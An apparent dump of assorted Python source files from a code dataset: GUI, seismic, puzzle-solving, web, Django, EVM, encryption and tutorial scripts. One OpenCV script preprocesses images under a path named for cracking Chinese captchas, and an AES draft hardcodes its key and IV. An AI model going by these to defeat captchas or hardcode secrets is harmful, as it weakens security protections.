checkboxTrue, checkboxFalse) :\n self.showGraphCheckBoxTrue = checkboxTrue\n self.showGraphCheckBoxFalse = 
checkboxFalse\n self.setShowGraph()\n\n def setShowGraph(self) :\n isOn = self.settings[\"Graph\"][\"bShowGraphOnFinish\"]\n self.showGraphCheckBoxTrue.setChecked(isOn)\n self.showGraphCheckBoxFalse.setChecked((isOn == False)) \n\n def setConsole(self, console) :\n \"\"\"\n Set the console (text area) so that logs can be written to it\n \"\"\"\n self.console = console\n Log.setConsole(console)","sub_path":"InfluenzaVirusModel/InfluenzaVirusModel/UIController.py","file_name":"UIController.py","file_ext":"py","file_size_in_byte":20062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320415914","text":"import simpleDali\nimport simpleMiniseed\nimport asyncio\nimport json\nimport logging\nfrom datetime import datetime, timedelta\nfrom array import array\n\nlogging.basicConfig(level=logging.DEBUG)\n\nhost = \"129.252.35.36\"\nport = 15003\n#host = \"127.0.0.1\"\n#host = \"129.252.35.20\"\n#port = 6382\nuri = \"ws://www.seis.sc.edu/dragracews/datalink\"\n\nprogramname=\"simpleDali\"\nusername=\"dragrace\"\nprocessid=0\narchitecture=\"python\"\n\n\nasync def doTest(loop):\n dali = simpleDali.SocketDataLink(host, port)\n serverId = await dali.id(programname, username, processid, architecture)\n print(\"Resp: {}\".format(serverId))\n #serverInfo = yield from dali.info(\"STATUS\")\n #print(\"Info: {} \".format(serverInfo.message))\n #serverInfo = yield from dali.info(\"STREAMS\")\n #print(\"Info: {} \".format(serverInfo.message))\n network = \"YY\"\n station = \"TEST\"\n location = \"00\"\n channel = \"HNZ\"\n trigtime = simpleDali.utcnowWithTz()\n\n streamid = \"{}.{}.{}.{}/MTRIG\".format(network, station, location, channel)\n hpdatastart = int(trigtime.timestamp() * simpleDali.MICROS)\n hpdataend = int(trigtime.timestamp() * simpleDali.MICROS)\n trigInfo= {\n \"type\": \"stalta\",\n \"time\": trigtime.isoformat(),\n \"network\": network,\n \"station\": station,\n \"location\": location,\n \"channel\": channel,\n \"sta\": 62,\n \"lta\": 418,\n \"creation\": trigtime.isoformat(),\n \"override\": {\n \"modtime\": trigtime.isoformat(),\n \"value\": \"enable\"\n }\n }\n trigBytes = json.dumps(trigInfo).encode('UTF-8')\n r = await dali.writeAck(streamid, hpdatastart, hpdataend, trigBytes)\n print(\"writem trigger resp {}\".format(r));\n await dali.close()\n\n\nloop = asyncio.get_event_loop()\nloop.set_debug(True)\nloop.run_until_complete(doTest(loop))\nloop.close()\n","sub_path":"python/autoTrigger.py","file_name":"autoTrigger.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"440043046","text":"#! 
python\nimport sys\nimport math\nimport euler\nimport itertools\n\ndef main():\n primes = []\n max_primes = []\n max_prime = 0\n\n limit = 1000000\n for i in range(1, limit):\n if euler.is_prime(i):\n primes.append(i)\n\n begin = 0\n end = begin + 1\n while begin < len(primes) - 1 and end < len(primes):\n p = primes[begin:end]\n s = sum(p)\n if s < limit:\n if euler.is_prime(s) and len(p) > len(max_primes):\n max_primes = p\n max_prime = s\n end += 1\n else:\n begin += 1\n end = begin + 1\n print(max_prime)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"p50.py","file_name":"p50.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"624605848","text":"#!/bin/python3\nimport sys\nimport itertools\n\n\ndef is_beautiful(s):\n \"\"\"\n Are the splits in `s` beautiful?\n \"\"\"\n leading_zeros = [d[0] == '0' for d in s]\n increasing = [int(s[i - 1]) + 1 == int(s[i]) for i in range(1, len(s))]\n res = not any(leading_zeros) and all(increasing)\n if res: # match, look for index\n return (res, s[0])\n else:\n return (res, None)\n\n\ndef separate_string(s, index):\n \"\"\"\n :param s: \n :param index: indices at which to split the string \n :return: \n >>> separate_string('abcd', [1, 2])\n ['ab', 'c', 'd']\n >>> separate_string('abcd', [0])\n ['a', 'bcd']\n \"\"\"\n # string from start to first index, rest of indices, then from last index til the end\n # 'abcdefgh', [0, 3] -> Split after 0, and after 3\n # 'a', 'bcd', ...\n # print(s[:index[0] + 1])\n # s_list = [s[:index[0]]]\n # s_list = [s[:index[0] + 1]]\n s_list = [(s[:index[0] + 1])] + \\\n [s[index[i] + 1: index[i + 1] + 1] for i in range(len(index) - 1)] + \\\n [s[index[-1] + 1:]]\n # s_list.extend([s[index[i] + 1: index[i + 1] + 1] for i in range(len(index) - 1)])\n # s_list.append(s[index[-1] + 1:])\n\n return s_list\n\n\ndef get_indices(s):\n \"\"\"\n Gets all combinations of indices after which to split the string `s`\n \n e.g. 
\"abc\" -> [[0, 1], [1]] means split \"abc\" after index 0 and 1, or after index 1\n \n :param s: string to split \n :return: list of list of indices at which to split `s`\n >>> get_indices('abc')\n \"\"\"\n bin_strings = itertools.product([True, False], repeat=len(s) - 1)\n position_list = []\n for bin_str in bin_strings:\n position_list.append([index for index, bool in enumerate(bin_str) if bool])\n return [p for p in position_list if len(p) > 0]\n\n\nq = int(input().strip())\nfor a0 in range(q):\n s = input().strip()\n indices = get_indices(s)\n li = [separate_string(s, i) for i in indices]\n res = False\n is_beautiful_res = [is_beautiful(l) for l in li]\n if len(is_beautiful_res) > 0:\n is_beautiful_bool, first_digit_list = zip(*is_beautiful_res)\n try:\n match_index = is_beautiful_bool.index(True)\n print('YES %s' % first_digit_list[match_index])\n except ValueError:\n print('NO')\n else:\n print('NO')\n # print('YES' if any([r[0] for r in is_beautiful_res]) else 'NO')\n","sub_path":"hackerrank/src/algorithms/strings/separate_the_numbers.py","file_name":"separate_the_numbers.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"556236231","text":"#!/usr/bin/python3\n#/////////////////////////////////////////////////////////////////////////////////////////\n#///////////////////////////////////// Dictionaries ///////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n\nnames_human = [\"Koorosh\", \"Morgane\", \"Pauline\", \"Justin\", \"Megan\", \"Till\", \"Marianna\", \"Borin\", \"Katherine\", \"Lee\", \"Anastasia\", \"Shyam\", \"Salona\", \"Estragon\", \"Vladimir\", \"Pozzo\", \"Godot\", \"Lucky\", \"Gary\"]\nnames_artists = {\"janis joplin\": \"singer\", \"william turner\": \"painter\", \"pier paolo pasolini\": \"film director\"}\nnames_cars = [\"Bugatti\", \"BMW\", \"Peykan\", \"Renault\", \"Mercedes-Benz\", \"Peugeot\", \"Citroen\", \"Alpine\"]\nnames_computers = [\"Altaire 8800\", \"IBM 610\", \"Kenbak-1\", \"MIR\", \"Datapoint 202\", \"Simon\", \"Micral N\"]\nuser1_info = {\"fname\":\"Grace\", \"lname\":\"Hopper\"}\nuser2_info = {\"fname\":\"mike\", \"lname\":\"Muuss\"}\nuser3_info = {\"fname\":\"Dennis\", \"lname\":\"Ritchie\"}\nuser4_info = {\"fname\":\"Ken\", \"lname\":\"Thompson\"}\ncar = {\"Window\": 4, \"Wheel\": 4, \"Antenna\": 1, \"Wheel\": 40}\n\n\n\n### How is a function written and called?\n# def welcome():\n# \tfor name in names_human:\n# \t\tprint(\"Hello {0} and welcome!\".format(name))\n# welcome()\n\n\n\n### How to pass information to a function\n# def welcome(name):\n# \tprint(\"Hello {0} and welcome!\".format(name))\n# for name in names_human:\n# \twelcome(name)\n\n\n\n### How to use positional arguments\n# name = \"Estragon\"\n# car = names_cars[0]\n# def friends_news(name, car):\n# \tprint(\"{0} has just bought a new {1}.\".format(name.upper(), car.upper()))\n# friends_news(name, car)\n\n\n\n### What are keyword arguments?\n### You do not need to pass keyword arguments in order\n# name = \"Estragon\"\n# car = names_cars[0]\n# def friends_news(person_name, person_car):\n# \tprint(\"{0} has just bought a new {1}.\".format(name.upper(), car.upper()))\n# friends_news(person_name = name, person_car = car)\n\n\n\n### How to use default values for arguments?\n# def animal_care(name, action = \"Feeding\"):\n# \tprint(\"Action to be taken on {0} is: {1}.\".format(name, action))\n# animal_care(\"Puppy\", 
\"Grooming\")\n# animal_care(\"caty\")\n# animal_care(\"Piggy\", \"Washing\")\n\n\n\n### How does retutn value work in python?\n# def artist(name, style):\n# \tartist_description = name.title() + \" was a \" + style.title() + \".\"\n# \treturn artist_description\n# for name, style in names_artists.items():\n# \tresult = artist(name, style)\n# \tprint(result)\n\n\n\n### Pass a list to a function\n### In this way, by making any changes to the username list,\n### the original names_human will also change\n# names = names_human\n# def greet_users(names):\n# \tfor name in names:\n# \t\tmsg = \"Hello, \" + name.title() + \"!\"\n# \t\tprint(msg)\n# greet_users(names)\n\n\n\n### Pass a list to a function without changing\n### the original list at later times by passing a copy of it\n### a copy of it to the function\n# names = names_human[:]\n# def greet_users(names):\n# \tfor name in names:\n# \t\tmsg = \"Hello, \" + name.title() + \"!\"\n# \t\tprint(msg)\n# greet_users(names)\n\n\n\n### Passing an unknown number of arguments\n# def account(*payments):\n# \ttransactions = []\n\n# \t\"\"\"Receiving the list of transactions\"\"\"\n# \tfor payment in payments:\n# \t\ttransactions.append(payment)\n\t\n# \t\"\"\"Calculating the account's balance\"\"\"\n# \tbalance = 0\n# \tfor amount in transactions:\n# \t\tbalance += amount\n\t\n# \t\"\"\"Printing the list of transactions\"\"\"\n# \tprint(\"The list of incomes and payments: \")\n# \tfor transaction in transactions:\n# \t\tprint(\"\\t{0}\".format(transaction))\n\n# \t\"\"\"Printing the balance\"\"\"\n# \tprint(\"\\nThe balance of your account:\\n\\t{0}$\\n\".format(balance))\n\n# account(27000, 30000, -26000)\n\n\n\n\n### How to put a function in a module and call it\n### the modules.py is include in the same folder\n# import modules\n# name = \"Zaza\"\n# modules.greet_people(name)\n\n\n### What is a .pyc file\n### This description comes from the link below:\n### https://www.tutorialspoint.com/What-are-pyc-files-in-Python\n# .pyc files are created by the Python interpreter when a .py file is imported.\n# They contain the \"compiled bytecode\" of the imported module/program so that\n# the \"translation\" from source code to bytecode (which only needs to be done once) \n# can be skipped on subsequent imports if the .pyc is newer than the corresponding .py file,\n# thus speeding startup a little. But it's still interpreted. \n# Once the *.pyc file is generated, there is no need of *.py file, unless you edit it.\n\n\n\n### How to correctly call a function that is written in a module\n# WHEN IMPORTING, CONSIDER THE FACT THAT IMPORTING THE ENTIRE MODULE IS DONE BY IMPORTING\n# ITS FILENAME. THIS MODULE MIGHT CONTAIN A METHOD AS THE NAME AS THE MODULE ITSELF. 
\n# AS A RESULT, DO NOT FORGET TO USE THE METHOD IN ONE OF THE FOLLOWING WAYS:\n# 1)\tIf importing the whole module:\n# \t\tExample:\n# \t\timport pprint\n# \t\tpprint.pprint(myDict)\n# 2)\tIf importing the method from module:\n# \t\tExample:\n# \t\tfrom pprint import pprint\n# \t\tpprint(myDict)\n\n\n\n### How to use `as` to give a function an alias\n# import modules as m\n# name = \"Zaza\"\n# m.greet_people(name)\n\n\n\n### How to import all functions located in a module\n# from modules import *\n# name = \"Zaza\"\n# greet_people(name)\n# farewell_people(name)\n\n\n\n","sub_path":"python/5 - Functions/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"571346797","text":"\"\"\"\nauthor: wiken\nDate:2019/6/3\n\"\"\"\n\nimport cv2 as cv\nimport time\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\nname_lst = os.listdir(\"./pic\")\nfor i in name_lst:\n if \".\" in i:\n # print(i)\n n = f'./pic/{i}'\n img = cv.imread(n)\n img2 = img.copy()\n h, w, c = img.shape\n # img = cv.GaussianBlur(img,(3,3),0)\n c1 = img[1, 1, 0]\n c2 = img[1, 1, 1]\n c3 = img[1, 1, 2]\n\n\n for c_ in range(c):\n if c_ == 0:\n cx = c1\n elif c_ == 1:\n cx = c2\n elif c_ == 2:\n cx = c3\n # print(cx, \"ss\")\n for h_ in range(h):\n for w_ in range(w):\n\n if cx-20 < img2[h_, w_, c_] < cx+20:\n img2[h_, w_, c_] = 0\n if img2[h_, w_, c_] > 190:\n img2[h_, w_, c_] = 0\n # gaus = cv.GaussianBlur(img2,(3,3),0)\n blured = cv.medianBlur(img2, 5)\n gaus = cv.GaussianBlur(blured,(3,3), 3, 0)\n cv.imshow(\"sss\", img2)\n gray = cv.cvtColor(gaus, cv.COLOR_BGR2GRAY)\n r, b = cv.threshold(gray, 0, 255,cv.THRESH_BINARY_INV + cv.THRESH_OTSU)\n name = f'./pic/dealed/{str(int(time.time()*1000))}.png'\n cv.imwrite(name, b)\n print(\"over\")\n # cv.imshow(\"ss\", b)\n # cv.waitKey(0)\n\n\n\n\n\n\n\n\n","sub_path":"my_opencv/p3_chinese_crack/package/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"380615246","text":"import json\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nSECRET_NAME_DATABASE = 'DatabaseCredentials'\nSECRET_NAME_AUTH0 = 'Auth0Secrets'\nSECRET_NAME_FLASK = 'FlaskSecrets'\n\nSECRET_STRING_DATABASE_HOST = 'db_host'\nSECRET_STRING_DATABASE_NAME = 'db_name'\nSECRET_STRING_DATABASE_USERNAME = 'db_username'\nSECRET_STRING_DATABASE_PASSWORD = 'db_password'\nSECRET_STRING_AUTH0_CLIENT_ID = 'client_id'\nSECRET_STRING_AUTH0_CLIENT_SECRET = 'client_secret'\nSECRET_STRING_AUTH0_API_BASE_URL = 'api_base_url'\nSECRET_STRING_FLASK_SECRET_KEY = 'secret_key'\n\n\nclass SecretsManager:\n \"\"\"Encapsulates Secrets Manager functions.\"\"\"\n\n def __init__(self):\n self.secretsmanager_client = boto3.client('secretsmanager')\n\n def get_value(self, name):\n \"\"\"\n Gets the value of a secret.\n\n :param name: The name of the secret to retrieve\n :return: The value of the secret. When the secret is a string, the value is\n contained in the `SecretString` field. 
When the secret is bytes,\n it is contained in the `SecretBinary` field.\n \"\"\"\n if name is None:\n raise ValueError\n\n try:\n kwargs = {'SecretId': name}\n response = self.secretsmanager_client.get_secret_value(**kwargs)\n except ClientError as e:\n return None\n else:\n return json.loads(response.get('SecretString'))\n","sub_path":"app/utils/secrets_manager.py","file_name":"secrets_manager.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"174063306","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\n\r\n# Create your models here.\r\nfrom django.utils.text import slugify\r\n\r\n\r\nclass Task(models.Model):\r\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\r\n title = models.CharField(max_length=200, null=True, blank=True)\r\n description = models.TextField(null=True, blank=True)\r\n complete = models.BooleanField(default=False)\r\n create = models.DateTimeField(auto_now_add=True)\r\n slug = models.SlugField(blank=True, null=True)\r\n\r\n def save(self, *args, **kwargs):\r\n self.slug = slugify(self.title)\r\n super(Task, self).save(*args, **kwargs)\r\n\r\n def __str__(self):\r\n return self.title\r\n\r\n class Meta:\r\n ordering = ['complete']\r\n","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"86029314","text":"\nfrom __future__ import absolute_import\nimport os\nfrom celery.schedules import crontab\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'useMongo.settings')\nfrom celery.contrib import rdb\n\nfrom django.conf import settings\nfrom celery import Celery\n\napp = Celery()\n\n# This reads, e.g., CELERY_ACCEPT_CONTENT = ['json'] from settings.py:\napp.config_from_object('django.conf:settings')\n\n# For autodiscover_tasks to work, you must define your tasks in a file called 'tasks.py'.\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\n@app.task(bind=True)\ndef debug_task(self):\n print(\"Request: {0!r}\".format(self.request))\n\napp.conf.beat_schedule = {\n 'add-every-monday-morning': {\n 'task': 'fanpages.tasks.crontab_get_posts',\n 'schedule': crontab(hour=17, minute=0),\n },\n}\n\napp.conf.timezone = 'UTC'\n","sub_path":"useMongo/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"510809308","text":"\"\"\"\nEthereum Virtual Machine (EVM) Logging Instructions\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n.. contents:: Table of Contents\n :backlinks: none\n :local:\n\nIntroduction\n------------\n\nImplementations of the EVM logging instructions.\n\"\"\"\nfrom functools import partial\n\nfrom ethereum.base_types import U256\n\nfrom ...fork_types import Log\nfrom .. 
import Evm\nfrom ..gas import (\n GAS_LOG,\n GAS_LOG_DATA,\n GAS_LOG_TOPIC,\n calculate_gas_extend_memory,\n charge_gas,\n)\nfrom ..memory import memory_read_bytes\nfrom ..stack import pop\n\n\ndef log_n(evm: Evm, num_topics: U256) -> None:\n \"\"\"\n Appends a log entry, having `num_topics` topics, to the evm logs.\n\n This will also expand the memory if the data (required by the log entry)\n corresponding to the memory is not accessible.\n\n Parameters\n ----------\n evm :\n The current EVM frame.\n num_topics :\n The number of topics to be included in the log entry.\n\n \"\"\"\n # STACK\n memory_start_index = pop(evm.stack)\n size = pop(evm.stack)\n\n topics = []\n for _ in range(num_topics):\n topic = pop(evm.stack).to_be_bytes32()\n topics.append(topic)\n\n # GAS\n extend_memory = calculate_gas_extend_memory(\n evm.memory, [(memory_start_index, size)]\n )\n charge_gas(\n evm,\n GAS_LOG\n + GAS_LOG_DATA * size\n + GAS_LOG_TOPIC * num_topics\n + extend_memory.cost,\n )\n\n # OPERATION\n evm.memory += b\"\\x00\" * extend_memory.expand_by\n log_entry = Log(\n address=evm.message.current_target,\n topics=tuple(topics),\n data=memory_read_bytes(evm.memory, memory_start_index, size),\n )\n\n evm.logs = evm.logs + (log_entry,)\n\n # PROGRAM COUNTER\n evm.pc += 1\n\n\nlog0 = partial(log_n, num_topics=0)\nlog1 = partial(log_n, num_topics=1)\nlog2 = partial(log_n, num_topics=2)\nlog3 = partial(log_n, num_topics=3)\nlog4 = partial(log_n, num_topics=4)\n","sub_path":"src/ethereum/dao_fork/vm/instructions/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"461807183","text":"import torch as tc\nimport numpy as np\n\n\nclass ResBlock(tc.nn.Module):\n def __init__(self, filters):\n super(ResBlock, self).__init__()\n self.conv_sequence = tc.nn.Sequential(\n tc.nn.Conv2d(filters, filters, (3,3), stride=(1,1), padding=(1,1)),\n tc.nn.BatchNorm2d(filters),\n tc.nn.ReLU(),\n tc.nn.Conv2d(filters, filters, (3,3), stride=(1,1), padding=(1,1)),\n tc.nn.BatchNorm2d(filters)\n )\n\n def forward(self, x):\n return tc.nn.ReLU()(x + self.conv_sequence(x))\n\n\nclass DownsamplingConvBlock(tc.nn.Module):\n def __init__(self, input_channels, output_channels):\n super(DownsamplingConvBlock, self).__init__()\n self.stack = tc.nn.Sequential(\n tc.nn.Conv2d(input_channels, output_channels, (4,4), stride=(2,2), padding=(1,1)),\n tc.nn.ReLU(),\n ResBlock(output_channels)\n )\n\n def forward(self, x):\n return self.stack(x)\n\n\nclass SmallConvNetClassifier(tc.nn.Module):\n def __init__(self, img_height, img_width, img_channels, num_filters, num_classes):\n super(SmallConvNetClassifier, self).__init__()\n self.img_height = img_height\n self.img_width = img_width\n self.img_channels = img_channels\n self.num_filters = num_filters\n self.num_classes = num_classes\n self.conv_stack = tc.nn.Sequential(\n DownsamplingConvBlock(img_channels, num_filters),\n DownsamplingConvBlock(num_filters, num_filters),\n DownsamplingConvBlock(num_filters, num_filters)\n )\n self.num_conv_features = (img_height // 8) * (img_width // 8) * num_filters\n self.fc = tc.nn.Linear(self.num_conv_features, self.num_classes)\n\n def forward(self, x):\n spatial_features = self.conv_stack(x)\n flat_features = tc.reshape(spatial_features, (-1, self.num_conv_features))\n logits = self.fc(flat_features)\n return 
logits\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"88324315","text":"from sanic import Sanic\nfrom sanic import response\nfrom sanic.config import Config\nfrom sanic.exceptions import RequestTimeout,NotFound\nimport configparser\n\nimport logging\nfrom logging import handlers\nimport socket\nfrom datetime import datetime\nimport requests\n\nimport asyncio\nimport uvloop\nimport aiomysql\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nloop = asyncio.get_event_loop()\n\n\n\n#routing_key = \"queue name\"\n\napp = Sanic(__name__)\n# remove logo\napp.config.LOGO = None\nConfig.REQUEST_TIMEOUT = 60\n\n\n \ndef jsonify(records):\n \"\"\"\n Parse aiomysql record response into JSON format\n \"\"\"\n #print(records)\n list_return = []\n \n for r in records:\n itens = r.items()\n list_return.append({i[0]:i[1].rstrip() if type(i[1])==str else i[1] for i in itens})\n return list_return \n\n@app.exception(RequestTimeout)\ndef timeout(request, exception): \n return response.text('RequestTimeout from error_handler.', 408)\n\n@app.exception(NotFound)\ndef not_found(request, exception):\n \"\"\"remove error for favicon.ico\"\"\"\n\n if \"favicon.ico\" in str(exception):\n return response.text('icon does not exists', 404)\n else:\n return response.text('Route does not exists', 404)\n \n@app.listener('before_server_start')\nasync def register_log(app, loop):\n # Create a database connection pool\n app.config['pool'] = await aiomysql.create_pool(host='127.0.0.1', port=3306,\n user='root', password='root',\n db='tcgplace', loop=loop,minsize=1,maxsize=3)\n \n \n app.api_logger = logging.getLogger('magic')\n if (len(app.api_logger.handlers) == 0):\n _tmp_folder = \"/tmp/\"\n LOG_BASE_NAME = \"magic\"\n LOG_SUFIX = '.log'\n LOG_FORMAT = '%(asctime)-15s %(levelname)s [%(username)s %(ip)s] - %(message)s'\n formatter = logging.Formatter(LOG_FORMAT)\n #main log\n app.api_logger.setLevel(logging.DEBUG)\n log_file_handler = handlers.TimedRotatingFileHandler(LOG_BASE_NAME+LOG_SUFIX, when='D', interval=1, backupCount=365, encoding='UTF-8', delay=False, utc=True)\n log_file_handler.setFormatter(formatter)\n app.api_logger.addHandler(log_file_handler)\n \n try:\n app.api_logger.info(\"start running %r %s at %s\",app,socket.gethostname(),datetime.now(),extra={'username': 'sanic','ip': socket.gethostbyname(socket.gethostname())})\n except:\n #log rotate\n app.api_logger.info(\"start running %r %s at %s\",app,socket.gethostname(),datetime.now(),extra={'username': 'sanic','ip': socket.gethostbyname(socket.gethostname())})\n\n\n\nasync def requests_async(url,data,params,headers,libexec=requests.get):\n \n params_data = dict(url=url,json=data,params=params,headers=headers)\n futures = [\n loop.run_in_executor(\n None, \n lambda: libexec(**params_data), \n )\n ]\n response_req = await asyncio.gather(*futures)\n \n return response_req[0]\n\n","sub_path":"desafio/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"149554389","text":"import paralleldots\r\nName = 'Gokul'\r\n\r\napi_key = '' #DO NOT PUBLISH KEY!\r\n\r\nparalleldots.set_api_key(api_key)\r\n\r\nFile_Name = 'test.py'\r\nFile_object = open(File_Name, \"a\")\r\nread_Object = File_object.read\r\n\r\n\r\ndef sentimentVal(receivedMessage):\r\n results = 
paralleldots.sentiment(receivedMessage, \"en\")\r\n output = 0\r\n emotion = 'neutral'\r\n for sense, num in results['sentiment'].items():\r\n if num > output:\r\n output = num\r\n emotion = sense\r\n return emotion\r\n\r\ndef messageSent(receivedMessage, emotion, Name):\r\n if emotion == 'positive' or emotion == 'neutral':\r\n message = Name + \" is safe. They said: \" + receivedMessage + \". - Mr.Gency Bot\"\r\n else:\r\n message = Name + \" may be in trouble. They said: \" + receivedMessage + \". If \\\r\n they are in trouble, please contact them or someone who may \\\r\n be able to help. - Mr.Gency Bot\"\r\n return message\r\n \r\n\r\n\r\n\r\n \r\n \r\nprint(messageSent(read_Object, sentimentVal(read_Object), Name))\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"277937463","text":"from MSB_LSB import decimalToBinary, binaryToDecimal\nfrom Crypto.Util.Padding import pad, unpad\nfrom Crypto.Random import get_random_bytes\nfrom bitstring import BitArray\nfrom Crypto.Cipher import AES\nfrom PIL import Image\nimport numpy as np\nimport random\nimport pickle\n\nimport math\nimport io\n\ndef create_image(bits):\n # Find the total items\n count = 0\n for i in bits:\n count = count + 1\n \n # Convert binary to decimal \n pixels = []\n for item in bits:\n bit = binaryToDecimal(item)\n pixels.append(bit)\n \n # Reshape to 2D array\n pixels = np.array(pixels)\n pixels = pixels.reshape(int(math.sqrt(count)), int(math.sqrt(count)))\n \n # Create the AES encrypted image\n img = Image.fromarray(np.uint8(pixels * 255) , 'L')\n size = int(math.sqrt(count)), int(math.sqrt(count))\n img = img.resize(size)\n \n return img\n\ndef image_aes_ofb(image_path):\n \n # Load pixels from image\n im = Image.open(image_path)\n px = im.load()\n \n # Get the height and width from the original image\n height = im.height\n width = im.width\n \n # AES-OFB encryption\n key = b'\\xfa\\xde8\\t\\xda\\xc0\\x9f\\xf9E%\\xee\\xb5P\\xe6\\x9b\\xc7'\n IV = b'\\xbe\\xad\\x17\\x19\\t\\x98`;\\xd5\\x1c\\xc9H\\xd3[\\xc2g'\n \n ciphertext = []\n for i in range(0,height):\n for j in range(0,width):\n bi = decimalToBinary(px[i,j])\n MSB = bi[:4]\n LSB = bi[4:]\n \n modify_pixel = LSB + MSB\n modify_pixel = bytes(modify_pixel, 'utf-8')\n \n cipher = AES.new(key, AES.MODE_OFB, IV)\n cipher_text = cipher.encrypt(pad(modify_pixel, 16)) \n ciphertext.append(cipher_text)\n \n # Use pickle to write the list\n with open('Di1.pickle', 'wb') as pickle_out:\n pickle.dump(ciphertext, pickle_out)\n \n print(\"Written done!\")\n \n return key, IV\n\ndef image_aes_decrypted(image_path, key, IV):\n\n # Load the data from the pickle file\n with open('Di1.pickle', 'rb') as List:\n List = pickle.load(List)\n \n PlainText = []\n for item in List:\n decipher = AES.new(key, AES.MODE_OFB, IV)\n pt = unpad(decipher.decrypt(item), 16)\n PlainText.append(pt)\n print(PlainText)\n \n img = create_image(PlainText)\n img = img.rotate(-90)\n img.save(\"yeah.png\")\n \n \n \nif __name__ == '__main__':\n key, IV= image_aes_ofb('/Users/home/github/Cypto/Reversible_Data_Hiding/pre_processed_img.png')\n # img.save('draft.png')\n \n \n image_aes_decrypted('/Users/home/github/Cypto/Reversible_Data_Hiding/draft.png', key, IV)\n ","sub_path":"Drafts/draft_pickle.py","file_name":"draft_pickle.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"270530495","text":"import os\nimport pandas as 
pd\n\nfrom .dfs import DfsModelResult\nfrom .pandas import DataFramePointModelResult, DataFrameTrackModelResult\nfrom .xarray import XArrayModelResult\n\n\nclass ModelResult:\n \"\"\"\n ModelResult factory returning a specialized ModelResult object\n depending on the input.\n\n * dfs0 or dfsu file\n * pandas.DataFrame/Series\n * NetCDF/Grib: Under development!\n\n Note\n ----\n If an input has more than one item and the desired item is not\n specified as argument on construction, then the item of the\n modelresult 'mr' **must** be specified by e.g. mr[0] or mr['item_B']\n before connecting to an observation.\n\n Examples\n --------\n >>> mr = ModelResult(\"Oresund2D.dfsu\")\n >>> mr_item = mr[\"Surface elevation\"]\n >>> mr = ModelResult(\"Oresund2D_points.dfs0\", name=\"Oresund\")\n >>> mr_item = mr[0]\n >>> mr_item = ModelResult(\"Oresund2D.dfsu\", item=0)\n >>> mr_item = ModelResult(\"Oresund2D.dfsu\", item=\"Surface elevation\")\n\n >>> mr = ModelResult(df)\n >>> mr = mr[\"Water Level\"]\n >>> mr_item = ModelResult(df, item=\"Water Level\")\n \"\"\"\n\n def __new__(self, input, *args, **kwargs):\n import xarray as xr\n\n if isinstance(input, str):\n filename = input\n ext = os.path.splitext(filename)[-1]\n if \"dfs\" in ext:\n mr = DfsModelResult(filename, *args, **kwargs)\n return self._mr_or_mr_item(mr)\n else:\n mr = XArrayModelResult(filename, *args, **kwargs)\n return self._mr_or_mr_item(mr)\n\n elif isinstance(input, (pd.DataFrame, pd.Series)):\n type = kwargs.pop(\"type\", \"point\")\n if type == \"point\":\n mr = DataFramePointModelResult(input, *args, **kwargs)\n elif type == \"track\":\n mr = DataFrameTrackModelResult(input, *args, **kwargs)\n else:\n raise ValueError(f\"type '{type}' unknown (point, track)\")\n return self._mr_or_mr_item(mr)\n elif isinstance(input, (xr.Dataset, xr.DataArray)):\n mr = XArrayModelResult(input, *args, **kwargs)\n return self._mr_or_mr_item(mr)\n else:\n raise ValueError(\"Input type not supported (filename or DataFrame)\")\n\n @staticmethod\n def _mr_or_mr_item(mr):\n if mr._selected_item is not None:\n return mr[mr._selected_item]\n else:\n return mr\n","sub_path":"fmskill/model/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"442649291","text":"import numpy as np\nimport pandas as pd\nfrom scipy import linalg\nfrom nltk.corpus import stopwords\nimport argparse\nfrom 